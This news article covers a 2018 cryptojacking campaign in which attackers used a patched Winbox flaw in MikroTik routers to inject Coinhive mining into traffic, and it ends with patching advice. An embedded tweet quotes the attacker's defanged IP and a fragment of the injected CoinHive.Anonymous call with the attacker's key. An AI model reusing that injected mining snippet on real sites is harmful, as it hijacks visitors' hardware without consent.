Cryptocurrencies have to be mined before they’re added in the system. In this attempt, there are a number of people who invest on a large amount of hardware and mine for themselves. Hackers are also in need of money, so they also choose mining as a great source for their income.
Unfortunately, in most cases, the hackers use others’ hardware for making money for themselves. Recently, security researchers discovered a massive cryptojacking campaign that targets and infects MikroTik routers with a copy of the Coinhive in-browser mining script. As you can tell, Coinhive mining script is one of the most popular in-browser mining scripts of all times.
The campaign appears to have started this week and at the first stage, was mainly active in Brazil. However, as its next target, it started infecting MikroTik routers all over the world.
A Brazilian researcher (@MalwareHunterBR) identified the attacks first. The attack continued growing infecting more and more routers and got the attention of Simon Kenin – a security researcher from Trustwave’s SpiderLabs division.
another mass exploitation against @mikrotik_com devices (https://t.co/4MxQbnNStA)
hxxp://170.79.26.28/
CoinHive.Anonymous(‘hsFAjjijTyibpVjCmfJzlfWH3hFqWVT3’, #coinhive pic.twitter.com/Nr8MA0TbzY— MalwareHunterBR (@MalwareHunterBR) July 30, 2018
Numbers of infected routers
In a report from Trustwave, Kenin mentioned that the hacker(s) behind the campaign successfully compromised at least 72,000 MikroTik routers at the first stage of attack in Brazil.
But at the second stage, it attacked and infected more and the total number rose up to 170,000.
Update: Using a different Coinhive key, a new campaign of similar type was ongoing. It’s not sure whether the attacker is the same or another one. In total, the number is about 200,000 of infected routers.
Infection method
Kenin also said that the hacker(s) take the advantage of a zero-day vulnerability in the Winbox component of MikroTik routers. This vulnerability was first discovered back in April this year and MikroTik fixed the problem within 24 hours. However, this doesn’t mean that all the owners of the routers took the necessary steps to apply the required patch.
The zero-day was dissected by a number of security researchers and in GitHub, there are public proof-of-concept codes available. Check out proof-of-concept 1 and 2.
According to Kenin, the attacker(s) took the advantage of the public codes for altering traffic passing through the router and inject a copy of Coinhive library inside all the pages that passed through the router.
It’s only one threat actor, according to what information was found about the attacking. All the script shared the same Coinhive key.
Other users infected
Kenin says that he was able to identify where some non-MikroTik users were also impacted. It happened because some Brazilian ISPs were using MikroTik as their main network and thus, the attacker(s) successfully injected malicious Coinhive mining script in a massive amount of web traffic.
The attacker is also smart enough to decrease the surface of the attack. If users would get a lot of trouble visiting sites, both the ISPs and users would perform investigation on what’s going on. Recently, the attacker(s) switched tactics and only injecting the scripts in error pages returned by routers.
This doesn’t have a downfall for the attacker as it seems. Kenin said that in recent days, he noticed the attack spreading all over the world and infected nearly as much as 170,000 MikroTik routers.
Thus, even if the attacking surface is only limited to error pages, there are potentially millions of daily pages for the attacker.
How to stay safe
If you own a MikroTik router, it’s a must that you have to upgrade your router’s firmware. Don’t forget to apply all the available patches as well.
It’s also recommended to reset the router to system default beforehand so that it will remove any possible malicious code present in the system.
